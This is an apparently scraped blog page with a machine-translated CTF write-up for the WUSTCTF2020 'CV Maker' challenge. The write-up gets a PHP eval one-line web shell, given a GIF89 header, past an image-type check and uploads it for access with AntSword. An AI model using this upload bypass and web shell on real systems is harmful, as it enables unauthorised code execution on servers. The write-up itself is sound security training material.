当前位置:网站首页>[WUSTCTF2020]CV Maker
[WUSTCTF2020]CV Maker
2022-07-27 00:50:00 【A new reading of the tea classic】
[WUSTCTF2020]CV Maker
f12 Nothing was found , Register login , It is found that the avatar can be changed , Guess file upload vulnerability


If you upload a normal photo , It is uploaded successfully and will be displayed , But if you upload one txt( I am the one who uploaded txt file ) Will show exif_imagetype not image!
exif_imagetype function : Used to judge the type of an image , Read the first byte of the image and check its signature , This function can be used to avoid calling other exif The function uses an unsupported file type or and $_SERVER['HTTP_ACCEPT'] Use in combination to check whether the browser can display a specified image .
Directly upload a one sentence Trojan horse with a picture header , Renamed as 1.php Upload , Find out php Files can also be uploaded directly :
GIF89
<?php
eval($_POST['123']);
?>
then f12, Found out uploads

Ant sword can be directly connected flag,url The address is :
http://xxxxxx.buuoj.cn:81/uploads/xxxx/profile.php


边栏推荐
- JSCORE day_ 01(6.30) RegExp 、 Function
- 2022.7.14DAY604
- 2022.7.14DAY605
- [RootersCTF2019]I_<3_Flask
- 2022.7.13
- [CTF 真题] 2018-网鼎杯-Web-Unfinish
- [2. TMUX operation]
- [3. Basic search and first knowledge of graph theory]
- The use of C language static can flexibly change the life cycle and make you write code like a duck to water
- 【Codeforces Round #808 (Div 2.) A·B·C】
猜你喜欢
![[HITCON 2017]SSRFme](/img/ed/4b396e5685bfe025eb96e34a8bd6a3.png)
[HITCON 2017]SSRFme
![[NPUCTF2020]ezinclude](/img/24/ee1a6d49a74ce09ec721c1a3b5dce4.png)
[NPUCTF2020]ezinclude

Dynamic binding, static binding, and polymorphism

JSCORE day_ 01(6.30) RegExp 、 Function

Two methods of automated testing XSS vulnerabilities using burpsuite
![[ciscn2019 North China Day1 web5] cyberpunk](/img/84/b186adc8becfc9b3def7dfd8e4cd41.png)
[ciscn2019 North China Day1 web5] cyberpunk

The company gave how to use the IP address (detailed version)

关于Thymeleaf的表达式

10 Web APIs
![[HFCTF2020]EasyLogin](/img/23/91912865a01180ee191a513be22c03.png)
[HFCTF2020]EasyLogin
随机推荐
[qt] container class, iterator, foreach keyword
【4.9 容斥原理详解】
[By Pass] 文件上传的绕过方式
箭头函数详解 2021-04-30
el-checkbox中的checked勾选状态问题 2021-08-02
Apply with new, delete and malloc, free to free the heap space
Input a string of letters and output the vowels inside. I hope you guys can give guidance
Point to plane projection
ArcGIS and CASS realize elevation points of cross-section Exhibition
Reduced dimension mean dot product matrix multiplicative norm probability normal distribution square loss
Export and import in ES6
C language to find prime numbers, leap years and minimum common multiples and maximum common divisors
[HITCON 2017]SSRFme
[CISCN2019 华北赛区 Day1 Web2]ikun
[4.1 prime number and linear sieve]
Vector size performance problems
[qt] meta object system
Detailed explanation of this point in JS
公司给了IP地址如何使用(详细版)
CUDA version difference between NVIDIA SMI and nvcc -v